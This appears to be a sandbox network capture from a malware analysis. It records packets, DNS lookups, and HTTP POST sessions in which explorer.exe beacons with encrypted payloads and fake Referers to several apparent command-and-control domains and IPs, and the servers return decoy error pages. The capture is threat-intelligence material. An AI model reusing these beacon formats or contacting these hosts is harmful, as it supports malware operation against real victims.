                                            Dec 19, 2024 11:00:39.079343081 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:39.198887110 CET805001094.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:39.198909998 CET805001394.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:39.198972940 CET5001080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:39.199024916 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:39.199218035 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:39.199258089 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:39.318814993 CET805001394.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:39.318877935 CET805001394.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:40.565376997 CET805001394.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:40.577049971 CET5001180192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.577833891 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.639664888 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.697760105 CET805001194.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:40.697801113 CET805001494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:40.697835922 CET5001180192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.697911024 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.698086977 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.698121071 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:40.818715096 CET805001494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:40.818759918 CET805001494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:42.052089930 CET805001494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:42.066133022 CET5001280192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.066770077 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.092792988 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:42.186614990 CET8050012194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:42.186654091 CET8050015194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:42.186687946 CET5001280192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.186741114 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.186908960 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.186943054 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:42.306554079 CET8050015194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:42.306631088 CET8050015194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:43.521437883 CET8050015194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:43.608438969 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:47.655689955 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.656384945 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.776156902 CET805001394.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:47.776182890 CET805001694.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:47.776212931 CET5001380192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.776276112 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.776496887 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.776541948 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:47.896007061 CET805001694.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:47.896152973 CET805001694.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:49.147445917 CET805001694.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:49.154002905 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.154767990 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.274190903 CET805001494.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:49.274291992 CET5001480192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.274439096 CET805001794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:49.274527073 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.274692059 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.274730921 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.327251911 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:49.395951986 CET805001794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:49.395987988 CET805001794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:50.646676064 CET805001794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:50.652403116 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.653104067 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.772900105 CET8050015194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:50.772950888 CET8050018194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:50.772995949 CET5001580192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.773039103 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.773264885 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.773303032 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:50.795845985 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:50.892791033 CET8050018194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:50.892930031 CET8050018194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:52.117582083 CET8050018194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:52.295850039 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:56.639198065 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.639919996 CET5001980192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.760374069 CET805001994.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:56.760425091 CET805001694.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:56.760519028 CET5001680192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.760525942 CET5001980192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.760693073 CET5001980192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.760725975 CET5001980192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:56.880178928 CET805001994.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:56.880338907 CET805001994.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:58.140840054 CET805001994.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:58.150202036 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.151030064 CET5002080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.217739105 CET5001980192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.270863056 CET805002094.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:58.271347046 CET805001794.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:58.271486044 CET5001780192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.271836042 CET5002080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.271836042 CET5002080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.271836042 CET5002080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:58.391464949 CET805002094.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:58.391597033 CET805002094.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:59.638279915 CET805002094.156.177.51192.168.2.5
                                            Dec 19, 2024 11:00:59.651143074 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:59.652076006 CET5002180192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:59.702080965 CET5002080192.168.2.594.156.177.51
                                            Dec 19, 2024 11:00:59.771333933 CET8050018194.85.61.76192.168.2.5
                                            Dec 19, 2024 11:00:59.771433115 CET5001880192.168.2.5194.85.61.76
                                            Dec 19, 2024 11:00:59.771645069 CET8050021194.85.61.76192.168.2.5
                                            Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                            Dec 19, 2024 10:58:10.189366102 CET  62897        53         192.168.2.5  1.1.1.1
                                            Dec 19, 2024 10:58:10.835478067 CET  53           62897      1.1.1.1      192.168.2.5
                                            Dec 19, 2024 10:58:12.325762033 CET  52325        53         192.168.2.5  1.1.1.1
                                            Dec 19, 2024 10:58:12.970824957 CET  53           52325      1.1.1.1      192.168.2.5
                                            Dec 19, 2024 10:58:14.483879089 CET  64375        53         192.168.2.5  1.1.1.1
                                            Dec 19, 2024 10:58:15.282099962 CET  53           64375      1.1.1.1      192.168.2.5
                                            Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                         Type            Class        DNS over HTTPS
                                            Dec 19, 2024 10:58:10.189366102 CET  192.168.2.5  1.1.1.1  0xc04c    Standard query (0)  constractionscity1991.lat    A (IP address)  IN (0x0001)  false
                                            Dec 19, 2024 10:58:12.325762033 CET  192.168.2.5  1.1.1.1  0xe875    Standard query (0)  restructurisationservice.ru  A (IP address)  IN (0x0001)  false
                                            Dec 19, 2024 10:58:14.483879089 CET  192.168.2.5  1.1.1.1  0x336d    Standard query (0)  connecticutproperty.ru       A (IP address)  IN (0x0001)  false
                                            Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                         CName  Address        Type            Class        DNS over HTTPS
                                            Dec 19, 2024 10:58:10.835478067 CET  1.1.1.1      192.168.2.5  0xc04c    No error (0)  constractionscity1991.lat           94.156.177.51  A (IP address)  IN (0x0001)  false
                                            Dec 19, 2024 10:58:12.970824957 CET  1.1.1.1      192.168.2.5  0xe875    No error (0)  restructurisationservice.ru         94.156.177.51  A (IP address)  IN (0x0001)  false
                                            Dec 19, 2024 10:58:15.282099962 CET  1.1.1.1      192.168.2.5  0x336d    No error (0)  connecticutproperty.ru              194.85.61.76   A (IP address)  IN (0x0001)  false
                                            Dec 19, 2024 10:58:15.282099962 CET  1.1.1.1      192.168.2.5  0x336d    No error (0)  connecticutproperty.ru              109.70.26.37   A (IP address)  IN (0x0001)  false
                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            0           192.168.2.5  49735        94.156.177.51   80                1028  C:\Windows\explorer.exe
                                            Timestamp                            Bytes transferred  Direction  Data
                                            Dec 19, 2024 10:58:10.959477901 CET  282                OUT        POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ferxsaaokurf.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 367
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:58:10.959510088 CET  367                OUT        Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ac 1a 27 bd
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)'cq?Mm|G`!Ms$%%N#49F#tR#KFnZ*-RaR/oWAMw`b'\"|HSU]>[ZuO&NEP"\;e
                                            Dec 19, 2024 10:58:12.319236040 CET  595                IN         HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:12 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            1           192.168.2.5  49741        94.156.177.51   80                1028  C:\Windows\explorer.exe
                                            Timestamp                            Bytes transferred  Direction  Data
                                            Dec 19, 2024 10:58:13.098994970 CET  284                OUT        POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://styqcrwcosyf.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 280
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:58:13.099046946 CET  280                OUT        Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8a 22 49 ce
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)"I/^ZRP4nS_#N\Zp"2nU=kpn^c`m}a`@XgYO@7}QPbViSo#gD;nC[}` al
                                            Dec 19, 2024 10:58:14.481053114 CET  597                IN         HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:14 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.5 | 49747 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:58:15.402757883 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fsprrtqwfiiffy.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 252
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:58:15.402770042 CET | 252 | OUT | POST body (binary)
                                            Dec 19, 2024 10:58:16.737190962 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:58:16 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.5 | 49897 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:21.502511978 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mitmeuexacjewbqk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 361
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:21.502590895 CET | 361 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:22.860023022 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:22 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.5 | 49902 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:22.987339020 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dfnihlnejuw.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 268
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:22.987365007 CET | 268 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:24.480494976 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:24 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.5 | 49908 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:24.609102964 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://artooybeyrmney.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 171
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:24.609158039 CET | 171 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:25.943614960 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.5 | 49914 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:26.316266060 CET | 282 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://sjfvofnibfsk.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 156
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:26.316322088 CET | 156 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:27.673820019 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:27 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.5 | 49915 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:27.820787907 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dyokvtiefurhr.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 306
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:27.820805073 CET | 306 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:29.184083939 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:28 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            8 | 192.168.2.5 | 49920 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:29.315151930 CET | 279 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://vtrdqlyaxcnu.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 298
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:29.315171957 CET | 298 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:30.651345015 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            9 | 192.168.2.5 | 49926 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:30.916336060 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://weaudxshysghyed.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 177
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:30.918894053 CET | 177 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:32.322904110 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:32 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            10 | 192.168.2.5 | 49928 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:32.475130081 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rmlqaewyesef.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 295
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:32.475718021 CET | 295 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:33.845381975 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:33 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            11 | 192.168.2.5 | 49933 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:33.970565081 CET | 278 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ipahuxcmqng.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 258
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:33.970581055 CET | 258 | OUT | POST body (binary)
                                            Dec 19, 2024 10:59:35.310946941 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            12 | 192.168.2.5 | 49939 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:35.854039907 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://yebogyjrnkttg.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 322
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:35.854075909 CET | 322 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:37.220084906 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:36 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            13 | 192.168.2.5 | 49942 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:37.353260040 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mbqncgggetrc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 289
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:37.354517937 CET | 289 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:38.727760077 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:38 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
